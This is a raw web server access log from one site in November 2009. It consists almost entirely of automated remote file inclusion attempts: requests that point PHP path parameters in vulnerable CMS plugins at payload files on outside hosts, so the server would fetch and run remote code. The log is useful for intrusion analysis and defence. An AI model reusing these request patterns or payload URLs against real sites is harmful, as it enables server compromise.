121.101.214.54 - - [08/Nov/2009:18:54:37 -0800] "GET /logs/access_090323.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kfd-koeln.de//newsletter/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.200.237.152 - - [08/Nov/2009:18:54:39 -0800] "GET /logs/access_090525.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://prety1.fileave.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.200.237.152 - - [08/Nov/2009:18:54:39 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://prety1.fileave.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.200.237.152 - - [08/Nov/2009:18:54:39 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://prety1.fileave.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:18:55:22 -0800] "GET /logs/access_090615.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:18:55:22 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:18:55:22 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:18:55:43 -0800] "GET /logs/access_090601.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
121.101.214.54 - - [08/Nov/2009:18:55:47 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kfd-koeln.de//newsletter/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [08/Nov/2009:18:55:47 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kfd-koeln.de//newsletter/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [08/Nov/2009:18:55:50 -0800] "GET /logs/access_090525.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kfd-koeln.de//newsletter/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [08/Nov/2009:18:57:55 -0800] "GET /logs/access_090323.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kfd-koeln.de//newsletter/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.106.139 - - [08/Nov/2009:18:59:03 -0800] "GET /labia/?M=A HTTP/1.1" 200 524 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
195.70.35.48 - - [08/Nov/2009:18:59:09 -0800] "GET /logs/access_091012.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [08/Nov/2009:18:59:09 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [08/Nov/2009:18:59:09 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [08/Nov/2009:19:00:10 -0800] "GET /logs/errors.php?error=http://www.kfd-koeln.de//newsletter/images/test.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
116.127.121.116 - - [08/Nov/2009:19:00:10 -0800] "GET /errors.php?error=http://www.kfd-koeln.de//newsletter/images/test.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
195.70.35.48 - - [08/Nov/2009:19:01:07 -0800] "GET /logs/access_090817.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
63.163.109.246 - - [08/Nov/2009:19:03:24 -0800] "GET /logs/access_090615.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mcclearyspub.com/images/los/id1.gif???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
63.163.109.246 - - [08/Nov/2009:19:03:36 -0800] "GET /logs/access_090601.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mcclearyspub.com/images/los/id1.gif???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [08/Nov/2009:19:03:43 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [08/Nov/2009:19:03:43 -0800] "GET /logs/access_090706.log%20%20///modules/xfsection/modify.php?dir_module=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [08/Nov/2009:19:03:43 -0800] "GET /logs///modules/xfsection/modify.php?dir_module=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [08/Nov/2009:19:04:12 -0800] "GET /logs/access_090831.log%20%20///modules/xfsection/modify.php?dir_module=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.116 - - [08/Nov/2009:19:07:11 -0800] "GET /errors.php?error=http://www.kfd-koeln.de//newsletter/images/test.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
116.127.121.116 - - [08/Nov/2009:19:07:11 -0800] "GET /logs/errors.php?error=http://www.kfd-koeln.de//newsletter/images/test.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
81.176.229.7 - - [08/Nov/2009:19:09:36 -0800] "GET /logs/access.log///modules/xfsection/modify.php?dir_module=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:19:10:37 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.kfd-koeln.de//newsletter/images//test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:19:10:37 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.kfd-koeln.de//newsletter/images//test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:19:10:44 -0800] "GET /logs///modules/xfsection/modify.php?dir_module=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:19:10:44 -0800] "GET /logs/access_090706.log%20%20///modules/xfsection/modify.php?dir_module=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:19:10:44 -0800] "GET //modules/xfsection/modify.php?dir_module=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.200.237.152 - - [08/Nov/2009:19:11:02 -0800] "GET /logs/access_090706.log/phphtml.php?htmlclass_path=http://prety1.fileave.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:19:12:21 -0800] "GET /logs/access_090831.log%20%20///modules/xfsection/modify.php?dir_module=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [08/Nov/2009:19:12:34 -0800] "GET /logs/access_090706.log///modules/xfsection/modify.php?dir_module=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [08/Nov/2009:19:12:46 -0800] "GET /logs/access_090831.log///modules/xfsection/modify.php?dir_module=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [08/Nov/2009:19:13:43 -0800] "GET /logs/access_090413.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [08/Nov/2009:19:14:09 -0800] "GET /logs/access_090817.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [08/Nov/2009:19:15:07 -0800] "GET /logs/access_091012.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:19:22:28 -0800] "GET /logs/access_090706.log///modules/xfsection/modify.php?dir_module=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:19:22:47 -0800] "GET /logs/access_090831.log///modules/xfsection/modify.php?dir_module=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.125.234.121 - - [08/Nov/2009:19:23:05 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://prety1.fileave.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.125.234.121 - - [08/Nov/2009:19:23:05 -0800] "GET /logs/access_091012.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://prety1.fileave.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.125.234.121 - - [08/Nov/2009:19:23:05 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://prety1.fileave.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.70.35.48 - - [08/Nov/2009:19:25:02 -0800] "GET /logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.dunkerquepromotion.org//images/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.88.226 - - [08/Nov/2009:19:27:10 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
121.78.88.226 - - [08/Nov/2009:19:27:10 -0800] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
121.78.88.226 - - [08/Nov/2009:19:27:10 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.230.112.35 - - [08/Nov/2009:19:28:19 -0800] "GET /logs/access.log///modules/xfsection/modify.php?dir_module=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.88.226 - - [08/Nov/2009:19:28:39 -0800] "GET /logs/access.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.4.12.3 - - [08/Nov/2009:19:29:21 -0800] "GET /logs/access_090309.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.rmvogue.sk/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.4.12.3 - - [08/Nov/2009:19:29:21 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.rmvogue.sk/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.4.12.3 - - [08/Nov/2009:19:29:21 -0800] "GET /logs/access_090323.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.rmvogue.sk/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.4.12.3 - - [08/Nov/2009:19:29:39 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.rmvogue.sk/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
164.125.234.121 - - [08/Nov/2009:19:32:29 -0800] "GET /logs/access_091012.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://prety1.fileave.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.137.176.69 - - [08/Nov/2009:19:35:50 -0800] "GET /includes/functions_portal.php?phpbb_root_path=http://www.backkarriere.de/templates/css/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.137.176.69 - - [08/Nov/2009:19:35:50 -0800] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://www.backkarriere.de/templates/css/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.137.176.69 - - [08/Nov/2009:19:35:50 -0800] "GET /logs/access_090824.log%20%20//includes/functions_portal.php?phpbb_root_path=http://www.backkarriere.de/templates/css/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.88.226 - - [08/Nov/2009:19:36:40 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.88.226 - - [08/Nov/2009:19:36:41 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.88.226 - - [08/Nov/2009:19:36:41 -0800] "GET /logs/access_090511.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.88.226 - - [08/Nov/2009:19:36:55 -0800] "GET /logs/access_090601.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:19:38:27 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:19:41:35 -0800] "GET /logs/access_090601.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
121.78.88.226 - - [08/Nov/2009:19:42:45 -0800] "GET /logs/access_090525.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.137.176.69 - - [08/Nov/2009:19:42:51 -0800] "GET /logs/access_090824.log//includes/functions_portal.php?phpbb_root_path=http://www.backkarriere.de/templates/css/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.88.226 - - [08/Nov/2009:19:42:54 -0800] "GET /logs/access_090504.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.enigma-knights.co.uk/mybb/images/groupimages/english/admin/l0l/mydb.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:19:53:54 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:19:53:54 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:19:53:54 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.193.15.3 - - [08/Nov/2009:20:05:03 -0800] "GET /logs/access_090406.log/?sourcedir=http://www.sweetwaterreporter.com/data/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:20:05:08 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.193.15.3 - - [08/Nov/2009:20:05:27 -0800] "GET /logs/access_090518.log/?sourcedir=http://www.sweetwaterreporter.com/data/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.193.15.3 - - [08/Nov/2009:20:05:31 -0800] "GET /?sourcedir=http://www.sweetwaterreporter.com/data/zfxid1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:07:50 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:07:50 -0800] "GET /logs/access_091012.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:07:50 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:07:50 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:07:50 -0800] "GET /logs/access_091012.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:07:50 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.193.15.3 - - [08/Nov/2009:20:07:55 -0800] "GET /logs/access_090615.log/?sourcedir=http://www.sweetwaterreporter.com/data/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.193.15.3 - - [08/Nov/2009:20:08:00 -0800] "GET /logs/access_090406.log/?sourcedir=http://www.sweetwaterreporter.com/data/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [08/Nov/2009:20:08:09 -0800] "GET /?sourcedir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [08/Nov/2009:20:08:09 -0800] "GET /logs/?sourcedir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [08/Nov/2009:20:08:09 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:08:10 -0800] "GET /logs/access_090420.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:08:10 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:08:12 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:08:20 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:08:20 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:08:20 -0800] "GET /logs/access_090420.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:08:28 -0800] "GET /logs/access_091012.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:08:28 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:08:33 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:08:33 -0800] "GET /logs/access_091012.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:08:33 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:08:33 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:08:39 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:08:39 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:08:39 -0800] "GET /logs/access_090420.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
63.174.244.10 - - [08/Nov/2009:20:08:39 -0800] "GET /include.php?path[docroot]=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:08:39 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
63.174.244.10 - - [08/Nov/2009:20:08:39 -0800] "GET /logs//include.php?path[docroot]=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:08:40 -0800] "GET /logs/access_090420.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
63.174.244.10 - - [08/Nov/2009:20:08:42 -0800] "GET /logs/access_090504.log//include.php?path[docroot]=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.12.74 - - [08/Nov/2009:20:08:44 -0800] "GET /index_inc.php?inc_ordner=http://www.kzk.ru/file/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.12.74 - - [08/Nov/2009:20:08:45 -0800] "GET /logs//index_inc.php?inc_ordner=http://www.kzk.ru/file/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
